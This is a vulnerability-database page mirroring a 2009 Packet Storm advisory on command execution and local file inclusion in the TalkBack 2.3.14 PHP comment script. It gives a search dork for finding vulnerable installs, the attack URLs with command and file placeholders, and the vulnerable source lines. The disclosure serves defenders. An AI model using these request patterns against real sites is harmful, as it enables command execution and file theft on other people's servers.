Lucene search
K

TalkBack 2.3.14 Execution / Local File Inclusion

🗓️ 10 Jul 2009 00:00:00Reported by jikoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

Execution of Local File Inclusion in TalkBack 2.3.14 scrip

Code
`JIKO No-exploit.Com  
Download:http://scripts.oldguy.us/talkback/downloads2/talkback2.3.14.zip  
Script : talkback V 2.3.14  
Dork:inurl:test.php Powered by TalkBack  
--------------------------------------------  
Edit Comment ~[+]  
talkback/comments.php?edit=1&edit_id=2&  
Command ~[+]  
talkback/addons/import.php?result=[Command]  
Code;  
$last_line = system($command, $result);  
Local File ~[+]  
Note : if floder install not deleted  
http://localhost/test/talkback/install/help.php?language=[File]  
code;  
$file = "../language/{$_REQUEST['language']}.php";  
if (!is_file($file))  
exit("Language file '$file' does not exist");  
include ($file);  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation